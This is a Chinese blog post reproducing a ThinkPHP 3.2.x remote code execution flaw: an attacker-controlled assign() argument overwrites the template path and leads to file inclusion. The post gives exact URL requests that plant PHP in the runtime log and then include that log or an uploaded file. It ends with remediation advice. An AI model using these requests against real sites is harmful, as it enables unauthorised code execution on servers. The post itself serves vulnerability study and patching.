thinkphp3.2.3 代码执行

最新推荐文章于 2024-05-16 09:31:14 发布
最新推荐文章于 2024-05-16 09:31:14 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46801402/article/details/127629591
版权

漏洞描述:

ThinkPHP3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。

漏洞利用条件:

利用条件为assign方法的第一个变量可控->变量覆盖->文件包含

漏洞影响范围:

thinkphp3.2.X

漏洞复现:

  1. 输入php代码:/index.php?a=--><?php%20phpinfo();%20?>返回报错信息:

2.日志文件路径:/Application/Runtime/Logs/Home/22_04_06.log,访问今天的日志文件

若开启debug模式日志路径:\Application\Runtime\Logs\Home\22_04_06.log
若未开启debug模式日志路径:\Application\Runtime\Logs\Common\22_04_06.log

3.构造攻击请求:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/22_04_06.log

也可以寻找程序上传入口,上传具有恶意代码的任何文件到服务器上/index.php?m=Home&c=Index&a=index&value[_filename]=./test.php

修复建议:

1.升级到最新的ThinkPHP版本,或者其它不受此漏洞影响的安全版本。

2.不建议直接使用assign方法对模板变量进行赋值。

3.减少使用高危函数如include等,如果必须使用可对函数进行文件内容过滤操作。

4.对所有输入提交可能包含文件地址的内容,包括服务器本地文件及远程文件,进行严格检查,参数中不允许出现./和../等目录跳转符。

5.严格检查文件包含函数中的参数是否被外界可控。

6.严格检查变量是否已经初始化。

学习记录,仅供参考!!!

想要暴富的小林子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp3.2.3漏洞_TPscan一键ThinkPHP漏洞检测工具
weixin_39820244的博客
11-25 6474
1.简要描述这个工具写完有一段时间了,看网上目前还没有一个thinkphp的漏洞集成检测工具,所以打算开源出来。2.代码结构插件化思想,所有的检测插件都在plugins目录里,TPscan.py主文件负责集中调度。插件目录:ThinkPHP 用户模块checkcode SQL注入漏洞ThinkPHP 5.0.23远程代码执行ThinkPHP 5.0.23 Debug模式远程代码执行Thi...
thinkphp3.2.3漏洞_实操web漏洞验证——OpenSSL POODLE 漏洞
weixin_39788740的博客
11-24 1337
今天我们来讲一下实战操作验证OpenSSL POODLE漏洞的方法,以下的操作实例都是通过漏洞扫描系统,扫描出存在相应漏洞的站点URL,由于系统存在一些误报,所以必须经过人工验证,才能确定漏洞的确存在。一、漏洞概述POODLE即Padding Oracle On Downgraded Legacy Encryption.是安全漏洞(CVE-2014-3566)的代号,俗称“贵宾犬”漏洞。 此漏洞是...
【Web】Ctfshow Thinkphp3.2.3代码审计(1)
uuzeray的博客
11-26 329
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关,其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log。在fetch方法中执行了eval('?访问/Application/Runtime/Logs/Home/21_04_15.log。发现任意命令执行后门:/index.php?题目提示要爆破,而且不超过365次 (1年的天数)查看附件源码 (config.php)发现定义了一个可执行命令的路由规则。
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞笔记
最新发布
程序员六七的博客
05-16 490
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
thinkphp3.2.3
qq_42307546的博客
07-01 347
php
ThinkPHP3.2.3_SQLi
Jeromeyoung
01-03 426
虽然是跟完了,但是如果能想一想这开发者为什么会这样写的话,会让我们对程序的代码逻辑更加亲切,也是一种提高审计能力的方法。我想:给where处理写一个解析数组的功能,肯定是为了迎合多个条件的where的情况,但是这里因为测试代码中只传入了一个条件所以没办法从这个漏洞跟一遍它的完整功能,但是看对exp进行的相关操作,开发者的原意应该是可以让“输入”去控制where条件中的判断逻辑符,比如‘>,
ThinkPHP3.2.3框架实现执行原生SQL语句的方法示例
10-17
本篇文章将深入探讨如何在ThinkPHP3.2.3框架中实现执行原生SQL语句,包括查询、插入、更新和删除操作。 首先,我们要了解ThinkPHP3.2.3中的Model层,它是用于处理数据模型的,包含了与数据库交互的主要方法。在执行...
ThinkPHP3.2.3
04-19
ThinkPHP3.2.3完全开发手册》提供了详尽的框架使用指南,涵盖了从安装、配置到实际开发的所有内容,是学习和使用ThinkPHP3.2.3的重要参考资料。 总结起来,ThinkPHP3.2.3是一个强大而全面的PHP开发框架,它提供...
thinkphp 3.2.3
03-25
《深入解析ThinkPHP 3.2.3框架》 ThinkPHP 3.2.3是一款基于MVC架构的PHP开发框架,由中国领先的开源社区——ThinkPHP团队开发并维护。这款框架以其简洁、高效的代码风格,丰富的功能特性以及良好的社区支持,在国内...
thinkphp3.2.3开发taskphp
12-29
【标题】"thinkphp3.2.3开发taskphp"涉及的主要知识点是基于ThinkPHP3.2.3框架进行特定任务处理系统(TaskPHP)的开发。ThinkPHP是中国较为流行的PHP开发框架,3.2.3是其稳定版本,提供了丰富的功能和良好的性能优化...
thinkphp3.2.3漏洞_更新:有POC发布 | Microsoft IE jscript远程命令执行0day漏洞(CVE20200674)通告...
weixin_39622138的博客
11-14 608
文档信息编号QiAnXinTI-SV-2020-0002关键字IE jscript.dllCVE-2020-0674创建日期2020年01月19日更新日期2020年03月1日TLPWHITE分析团队奇安信威胁情报中心红雨滴团队通告概要2020年1月17日,在微软的每月的例行补丁日两天之后,发布了编号为ADV200001的例行外安全公告,该公告的披露涉及一个野外发现的0day漏洞CVE-...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
thinkphp3.1.2的通用网站后台
10-28
thinkphp3.1.2的通用网站后台
ThinkPhp日志文件遍历工具.zip
06-22
漏洞利用,目录扫描。。
ThinkPHP3.2.3框架Memcache缓存使用方法实例总结
01-02
本文实例讲述了ThinkPHP3.2.3框架Memcache缓存使用方法。分享给大家供大家参考,具体如下: 前面一篇文章讲述了Linux下安装Memcached服务器和客户端,这里来总结一下ThinkPHP3.2.3框架Memcache的使用方法。 方法一:原生Memcache的写法 public function test1() { $mc = new \Memcache(); //创建Memcache对象 $mc->connect(127.0.0.1, 11211); //连接Memcached服务器 $mc->set('test1','hello world',0,10
thinkphp3.2.3漏洞_【漏洞预警】SaltStack远程命令执行漏洞
weixin_39658966的博客
11-24 945
SaltStack远程命令执行漏洞(CVE-2020-11651、CVE-2020-11652)2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在认证绕过致命令执行漏洞以及目录遍历漏洞。漏洞描述SaltStack是基于Python开发的一套C/S架构配置管理工具。国外某安全团队披露了SaltStack存在认证绕过漏洞(CVE-2020-11651)...
【安全漏洞】ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1624
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
thinkphp3.2.3漏洞_信息安全漏洞月报(2020年5月)
weixin_39945795的博客
11-23 2869
漏洞态势根据国家信息安全漏洞库(CNNVD)统计,2020年5月份采集安全漏洞共1186个。本月接报漏洞16377个,其中信息技术产品漏洞(通用型漏洞)201个,网络信息系统漏洞(事件型漏洞)16176个。重大漏洞预警微软多个安全漏洞:包括Microsoft SharePoint 安全漏洞(CNNVD-202005-567、CVE-2020-1024)、Microsof...
thinkphp3.2.3 远程执行
09-07
ThinkPHP 3.2.3中,远程执行漏洞是指攻击者能够通过网络发送恶意请求,使得应用程序执行非预期的命令或代码。这可能导致严重的安全问题,例如获取敏感数据、修改数据库、操纵系统等。 为了防止远程执行漏洞的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值